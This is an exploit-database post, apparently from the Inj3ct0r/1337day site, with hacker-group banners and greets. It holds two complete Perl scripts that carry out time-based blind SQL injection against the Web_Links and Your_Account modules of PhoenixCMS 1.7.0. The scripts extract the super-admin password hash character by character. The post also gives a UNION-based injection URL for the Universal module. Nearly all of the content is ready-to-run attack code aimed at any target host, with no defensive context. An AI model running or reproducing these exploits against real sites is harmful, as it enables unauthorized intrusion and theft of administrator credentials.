PhoenixCMS 1.7.0 SQL Injection

`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
#!/usr/bin/perl  
system("cls");  
sub logo() {  
print q'  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
1 ______ 0  
0 .-" "-. 1  
1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0  
0 Algerian HaCker | | > Site : 1337day.com | 1  
1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0  
0 | )(_o/ \o_)( | > [email protected] | 1  
1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0  
0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1  
1 _ ) \_______\__|IIIIII|__/_______________________ 0  
0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1  
1 )_/ \ / 0  
0 (@ `--------` © 2011, Inj3ct0r Team 1  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0  
0 PhoenixCMS 1.7.0 Module(Web_Links) Blind SQL Injection Exploit 1  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0  
';  
}  
###  
# Title : PhoenixCMS 1.7.0 Module(Web_Links) Remote Blind SQL Injection Exploit  
# Author : KedAns-Dz  
# E-mail : [email protected] | [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com  
# Twitter page : twitter.com/kedans  
# platform : php  
# Impact : Remote Blind SQL Inj3cTi0n Exploit (via PERL)  
# Tested on : Windows XP sp3 FR & Linux.(Ubuntu 10.10) En  
###  
  
use strict;  
use LWP::UserAgent;  
  
sub Usage() {  
print "[+] Usage: perl ./$0 <host>\n";  
print "[+] Example: perl ./$0 http://www.site.com/ \n";  
}  
logo();  
print "\n";  
my $host = shift || die Usage() ;  
$host .= "modules.php?name=Web_Links&l_op=Add&title=DZ&description=DZ";  
my $attack = LWP::UserAgent->new;  
my $pass = "";  
$attack->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');  
my @charset = (45..57, 95..103);  
print "[+] Trying to exploit the SQL Injection\n";  
  
for (my $j = 1; $j <=32; $j++) {  
sleep(3);  
foreach (@charset) {  
sleep(2);  
print "[+] Now trying with $_ \n";  
my $before = time();  
my $resp = $attack->post($host,  
{ url => "'/**/UNION SELECT  
IF(SUBSTRING(pwd,$j,1)=CHAR($_),sleep(6),null) FROM nuke_authors WHERE  
radminsuper='1" },  
Referer => $host);  
my $after = time();  
if(int($after-$before)) {  
print "[+] Success with ".chr($_)."\n";  
$pass .= chr($_);  
last;  
}  
}  
}  
print "[+] MD5 Hash : $pass\n";  
  
=================================================  
  
#!/usr/bin/perl  
system("cls");  
sub logo() {  
print q'  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
1 ______ 0  
0 .-" "-. 1  
1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0  
0 Algerian HaCker | | > Site : 1337day.com | 1  
1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0  
0 | )(_o/ \o_)( | > [email protected] | 1  
1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0  
0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1  
1 _ ) \_______\__|IIIIII|__/_______________________ 0  
0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1  
1 )_/ \ / 0  
0 (@ `--------` © 2011, Inj3ct0r Team 1  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0  
0 PhoenixCMS 1.7.0 Module(Your_Account) Blind SQL Injection Exploit 1  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0  
';  
}  
###  
# Title : PhoenixCMS 1.7.0 Module(Your_Account) Remote Blind SQL Injection Exploit  
# Author : KedAns-Dz  
# E-mail : [email protected] | [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com  
# Twitter page : twitter.com/kedans  
# platform : php  
# Impact : Remote Blind SQL Inj3cTi0n Exploit (via PERL)  
# Tested on : Windows XP sp3 FR & Linux.(Ubuntu 10.10) En  
###  
  
use strict;  
use LWP::UserAgent;  
  
  
sub Usage() {  
print "[+] Usage: perl ./$0 <host>\n";  
print "[+] Example: perl ./$0 http://www.site.com/ \n";  
}  
logo();  
print "\n";  
my $host = shift || die Usage() ;  
$host .= "modules.php?name=Your_Account&op=activate&username=DZ";  
my $attack = LWP::UserAgent->new;  
my $pass = "";  
$attack->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');  
my @charset = (45..57, 95..103);  
print "[+] Trying to exploit the SQL Injection\n";  
  
for (my $j = 1; $j <=32; $j++) {  
sleep(3);  
foreach (@charset) {  
sleep(2);  
print "[+] Now trying with $_ \n";  
my $before = time();  
my $resp = $attack->post($host,  
{ url => "'UNION/**/SELECT IF(SUBSTRING(pwd,$j,1) = CHAR($_),sleep(6),null),1,2,3,4,5,6 FROM nuke_authors WHERE radminsuper='1" },  
Referer => $host);  
my $after = time();  
if(int($after-$before)) {  
print "[+] Success with ".chr($_)."\n";  
$pass .= chr($_);  
last;  
}  
}  
}  
print "[+] MD5 Hash : $pass\n";  
  
  
=================================================  
  
###  
# Title : PhoenixCMS 1.7.0 Module(Universal) SQL Injection Vulnerability  
# Author : KedAns-Dz  
# E-mail : [email protected] | [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com  
# Twitter page : twitter.com/kedans  
# platform : php  
# Impact : Remote SQL Inj3cTi0n Vulnerability  
# Tested on : Windows XP sp3 FR & Linux.(Ubuntu 10.10) En  
###  
# (~) special Greets to : Caddy-Dz & JaGo-Dz & Dr.Ride + All My Friends   
###  
  
# (+) Exploit :  
  
http://[target]/[path]/modules.php?name=Universal&op=CatIndex&cid=[-!SQLi Here!-]  
http://[target]/[path]/modules.php?name=Universal&op=CatIndex&cid=3+and+1=2+union+select+1,version(),3,4,5--  
  
# (^_^) ! Good Luck ALL ...  
  
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================   
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >  
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *  
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ ....   
# Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org)   
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)  
# www.metasploit.com * www.09exploit.com * All Security and Exploits Webs ...  
#================================================================================================  
`